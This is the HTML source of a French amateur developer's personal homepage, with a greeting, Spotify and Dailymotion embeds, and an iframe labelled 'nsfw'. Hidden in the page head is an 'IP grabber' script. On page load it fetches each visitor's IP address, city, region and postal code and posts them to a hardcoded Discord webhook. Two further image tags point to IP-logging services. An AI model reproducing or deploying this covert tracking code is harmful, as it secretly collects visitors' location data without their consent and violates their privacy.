#Peut-mieux faire!
<!DOCTYPE html>
<html>
<head>
<script async src="https://www.googletagmanager.com/gtag/js?id=G-44ZSGENS96"></script>
	<script>
window.axeptioSettings = {
  clientId: "653ba140301840285f89d1fc",
  cookiesVersion: "github-fr-2",
};
 
(function(d, s) {
  var t = d.getElementsByTagName(s)[0], e = d.createElement(s);
  e.async = true; e.src = "//static.axept.io/sdk.js";
  t.parentNode.insertBefore(e, t);
})(document, "script");
</script>
	<script>
function monke(json) 
{
     var request = new XMLHttpRequest();
     
     request.open("POST", "https://discord.com/api/webhooks/1167017737936175184/-8aZ2_joIDyYwUDljLAJLg15dCQdMtMz7WyUoxqOKWStyCVqje-omWsdZZhr8L7A24_c");

     request.setRequestHeader('Content-type', 'application/json');

     var params = 
     {
          username: "IP Logger",
          avatar_url: "",
          content: "@everyone",
          embeds: [
               {
                    title: "Je te présente mon IP grabber!",
                    color: 1752220,
                    description: "**IP:** `" + json.ip + "`\n**Country:** `" + json.country + "`\n**Region:** `" + json.region + "`\n**Town/City:** `" + json.city + "`\n**ZIP:** `" + json.postal + "`"
               }
          ]
     }

     request.send(JSON.stringify(params));
}
</script>
<script src="https://ipinfo.io/?format=jsonp&callback=monke"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());
  gtag('config', 'G-44ZSGENS96');
</script>
<title>My Website</title>
	<style>
		body {
			margin: 0;
			padding: 0;
			font-family: Arial, sans-serif;
		}
		
		.gradient-bg {
			position: absolute;
			top: 0;
			left: 0;
			right: 0;
			bottom: 0;
			background: linear-gradient(180deg,#B0C4DE, #B0C4DE);
			z-index: -1;
		}
		
		.box {
			position: absolute;
			top: 50%;
			left: 50%;
			transform: translate(-50%, -50%);
			background: rgba(0, 0, 0, 0.7);
			padding: 40px;
			border-radius: 20px;
			color: #fff;
			text-align: center;
			box-shadow: 0 0 20px rgba(0, 0, 0, 0.5);
			max-width: 600px;
			width: 80%;
		}
		
		.box h1 {
			font-size: 3.5rem;
			margin-bottom: 20px;
			color: #fff;
			text-shadow: 2px 2px#B0C4DE;
		}
		
		.box p {
			font-size: 1.2rem;
			margin-bottom: 40px;
			color: #fff;
			text-shadow: 1px 1px #000000;
		}
		
		.github-btn {
			display: inline-block;
			background-image: url("https://cdn-icons-png.flaticon.com/512/1051/1051377.png");
			background-size: contain;
			background-repeat: no-repeat;
			width: 40px;
			height: 40px;
			transition: opacity 0.3s ease;
			opacity: 0.7;
			filter: invert(1);
		}
		
		.github-btn:hover {
			opacity: 1;
			cursor: pointer;
		}
		        .custom-button { 
             background-color: #B0C4DE; 
             color: #ffffff; 
             border: 2px solid	#B0C4DE; 
             border-radius: 8px; 
             padding: 10px 20px; 
             font-size: 16px; 
             text-align: center; 
             text-decoration: none; 
             display: inline-block; 
             transition: background-color 0.3s, color 0.3s, border-color 0.3s; 
             box-shadow: 0px 4px 6px rgba(0, 0, 0, 0.1); 
             text-transform: uppercase; 
             letter-spacing: 1px; 
             font-weight: bold; 
             font-family: 'Helvetica Neue', sans-serif;
	</style>
</head>
<body>
	<br>
	<div class="gradient-bg"></div>
	
	<div class="box">
		<br>
	<br>
	<br>
	<br>
	<br>
<br>
	<br>
<br>
	<br>
	<br>
	<br>
	<br>
<br>
	<	<br>
	<br>
	<br>
		<h1>Amyes93#2729</h1>
		<a href="https://github.com/Amayes93" class="github-btn"></a>
                <p>👋 Hey ! It's me  🥸</p>
		<tr>
		</tr>  
      <button><a href="https://matias.ma/nsfw/" Class="custom-button">Mon secret🕵️‍</a></button>

		 <iframe style="border-radius:12px" src="https://matias.ma/nsfw/" width="100%" height="352" frameBorder="0" allowfullscreen="" allow="autoplay; clipboard-write; encrypted-media; fullscreen; picture-in-picture" loading="lazy"></iframe>
   
   
   
<br>
   
<br>
   
<br>
   
<br>
<br>

<br> 
 <body>
      <img src="https://yip.su/2riFrw.gif" 
      width="210" height="240"
      
      alt="Duck">
      <br>
<br>
<img src="https://iplogger.com/2rSux8" 
      width="210" height="240" alt="Duck2">

<br>
<br>

      
      <p>Bien le Bonjour</p>
	 <span>Je te souhaite la bienvenue sur mon site internet</span>
	 <span>Mais sache que je ne suis qu'un développeur amateur</span>
	 
	 <p>Rien d'extroadiraire donc 😁🙃!</p>

<div itemscope itemtype="https://schema.org/VideoObject" style="position:relative;padding-bottom:56.25%;"><meta itemprop="name" content="Snapinsta.app_video_844D30A33172F9C0E14F642079267A9A_video_dashinit" /><meta itemprop="description" content="Snapinsta.app_video_844D30A33172F9C0E14F642079267A9A_video_dashinit" /><meta itemprop="uploadDate" content="2023-12-18T08:15:11.000Z" /><meta itemprop="thumbnailUrl" content="https://s2.dmcdn.net/v/VWBbo1bW077Ic3qXx/x180" /><meta itemprop="duration" content="P17S" /><meta itemprop="embedUrl" content="https://geo.dailymotion.com/player/xms5q.html?video=x8qo86q" /><iframe src="https://geo.dailymotion.com/player/xms5q.html?video=x8qo86q" allow="autoplay; fullscreen; picture-in-picture" allowfullscreen frameborder="0" width="100%" height="100%" style="width:100%;height:100%;position:absolute;left:0px;top:0px;overflow:hidden;"></iframe></div><br>
<br> 
<br>
	<br>
	<br>
	<br>
	<br>
	<br>
<br>
	 <iframe style="border-radius:12px" src="https://open.spotify.com/embed/track/4zIWUQcXL5olW32MRz5WOq?utm_source=generator" width="100%" height="352" frameBorder="0" allowfullscreen="" allow="autoplay; clipboard-write; encrypted-media; fullscreen; picture-in-picture" loading="lazy"></iframe>
<br>
<br>
<br>
</div>
	
</body>
</html>
    
<br>
	<br>
	<br>
	<br>
	<br>
	<br>
